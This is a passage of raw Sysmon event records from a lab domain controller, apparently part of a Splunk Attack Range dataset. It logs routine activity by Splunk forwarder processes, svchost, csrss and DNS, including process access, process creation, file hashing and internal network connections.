Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202268Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.161{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202267Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.161{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202266Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.161{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202265Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.161{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202264Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.161{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E896-6040-1E4E-00000000AD01}5688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202263Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.161{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E896-6040-1E4E-00000000AD01}5688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202262Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.162{5ABCFE62-E896-6040-1E4E-00000000AD01}5688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202289Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:03.661{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=130CFE1E1AD17266BD9DF07D8AE0E809,SHA256=0A63133E3A129D6EDE6B207F26D81B5DB91DEED179555AE533B921BB90E4F902,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202288Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:03.411{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E897-6040-204E-00000000AD01}2788C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202287Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:03.411{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202286Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:03.411{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202285Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:03.411{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202284Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:03.411{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202283Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:03.411{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E897-6040-204E-00000000AD01}2788C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202282Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:03.411{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E897-6040-204E-00000000AD01}2788C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202281Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:03.412{5ABCFE62-E897-6040-204E-00000000AD01}2788C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202280Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:03.068{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAEEE7E2A1B2926778CFB8AE2AE3AF68,SHA256=494A1870779CC0520924157ED611156A8592B9EC095B7DB9D1EFEEA801DCE968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202292Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:04.724{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7C088F648F0EA8B669BF56294AB8F2F,SHA256=375FAC758B6CB0CD8A83575611143E17A0464F15046E01497CDEDC90CE49E970,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202291Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:04.646{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAA1AEDC7C4B854156362D7E08ECBBE2,SHA256=6F8C35A5F6C8095AE46EB9E32CA1439A1DFBD814E4813ED32733C3A35DFE716E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202290Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:59.794{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local59441- 23542300x80000000000000002202294Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:05.739{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC2BFA1F925100F413EC6E771D5E07CE,SHA256=1E9C8BCA14540F56DDAC75D9C908147269181C3D6CE24FB2E3815BF14886AA4A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202293Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:00.809{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-59441- 23542300x80000000000000002202297Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:06.896{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202296Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:06.771{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=919887EAEB673E4CEB80C9C4F51D10FA,SHA256=947EF07C78821DADF70720182183F357055E2FDF211A1DFCA4C4ADCEC01B190E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202295Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:06.068{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E61681796D0A2E0D913AF25A831B23EA,SHA256=295FF0539EAC22636104CD73ED2293F668CEE15E67D452D43EB17CCCC0865EFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202301Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:07.958{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AFBA8B9E7169C11E618E7670958E91DB,SHA256=62AE2E7765D0520B696908FB6DAC7A0E86A7676D3D6FF89EC6DE7F81CF65796A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202300Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:07.771{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAF67B957209E77BC28BA38C289E1877,SHA256=B12436F852E9D8FDBBA2E4EE8F014148917F61E9E781E47682E136610E57B091,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202299Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:03.863{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-51538-true2001:500:9f:0:0:0:0:42l.root-servers.net53domain 354300x80000000000000002202298Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:02.872{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60620-false10.0.1.12-8000- 23542300x80000000000000002202303Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:08.864{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD204CCD6F46DB3CCCF8698B8A470686,SHA256=A9EC1C821BF36272830CA3AF10511B50FB23EBCA84688F8766AFB6B2D123AF96,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202302Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:04.716{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60621-false10.0.1.12-8089- 23542300x80000000000000002202304Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:09.880{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6918843D7019C28D5B2C5FB33BCEC81,SHA256=5185587B990AC0413070E75E0CA7A4452A52A956FFEA64B7391ACD5240F93E97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202305Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:10.989{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7443DB34EEBB0BCE49682AED73844640,SHA256=88A6B4144DFE11BD497EE4B9A532A6820CB2337A4180BDD0156801BEE8CF590B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202306Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:11.036{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3958F7718D9D6243F42D6F6C68CC4BE5,SHA256=539ECFB961FCD4F8E7E113E5506817CB9E82889CBD2768CC1CA6A7A3694B8B9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202308Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:07.920{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60622-false10.0.1.12-8000- 23542300x80000000000000002202307Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:12.224{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFF9106BED45DD167A558BE6D7EE69F0,SHA256=389FE64A3C22A162447E5A603D35DD2D80F40D08BE78A1841D0F0DC61C5AFFE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202309Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:13.239{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7CD7AB2045BE2B8D750B3E682C0F845,SHA256=B9860589F85988C4EB68E698F974FB16C3C421D68176D145D958C4666DE33035,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202311Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:14.833{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA13FE518AA3969885AC45DAF9828061,SHA256=E27167E5E98983E011E9A49869E392E21A7C6AC2FB893BECADFC799D8609543C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202310Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:14.239{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=273DA6958DBB4F21E418C67C295EF270,SHA256=0B9B0F7A8DDD58323EC56EE2AE4FB5EB8E596987CBF9C427E4E87D6742A902E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202314Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:11.483{5ABCFE62-842F-603E-0D00-00000000AD01}912C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 